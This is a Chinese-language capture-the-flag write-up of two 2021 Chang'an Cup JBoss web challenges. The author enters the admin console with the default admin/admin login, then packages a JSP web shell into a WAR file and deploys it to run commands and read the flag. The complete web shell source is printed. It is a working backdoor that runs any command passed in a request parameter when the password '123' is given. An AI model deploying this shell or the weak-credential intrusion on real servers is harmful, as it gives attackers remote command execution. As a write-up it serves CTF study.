2021长安杯WEB题部分WP

1.前言

​ 怎么说呢，这次的长安杯比赛的题目有些奇怪。当然这里指我怎么也看不懂的WEB第一题《soeasy》，还有我做的这两道JBOSS的题目。当我做出第一道JBOSS之后，我发现他只是一道很简单的RCE，但是不久平台又放出了第二道JBOSS题目。额。。。怎么说呢？虽然他的题目描述上有JBOSS很不甘心的字眼，但这两道题明明是同一个解题方式呀。

2.正文

题目的话就是上面的这两道，题目在这里就一起说了，因为解法都是一样的（X。
首先拿到题目，一个JBOSS的管理界面。

然后进入管理员控制台登陆界面。

这里的话就是一个弱口令，admin，admin没有什么好说的。直接就进到了后台管理界面。

在后台的管理界面看到了上传WAR包的地方，那么很明显这道题考察的就是Jboss 5.x/6.x admin-Console后台部署war包相关的知识。
那么先拿一个脚本生成WAR包。下面这个脚本来源于这位大佬

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("<pre>");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("</pre>");
    } 
%>

生成war包

然后上传


然后利用传参进行RCE

cat一下flag，拿到flag

3.后记

在文章的刚开始就说过了，两道题都可以通过同一个方式拿到flag，虽然不知道为什么，很有可能是出题方的失误。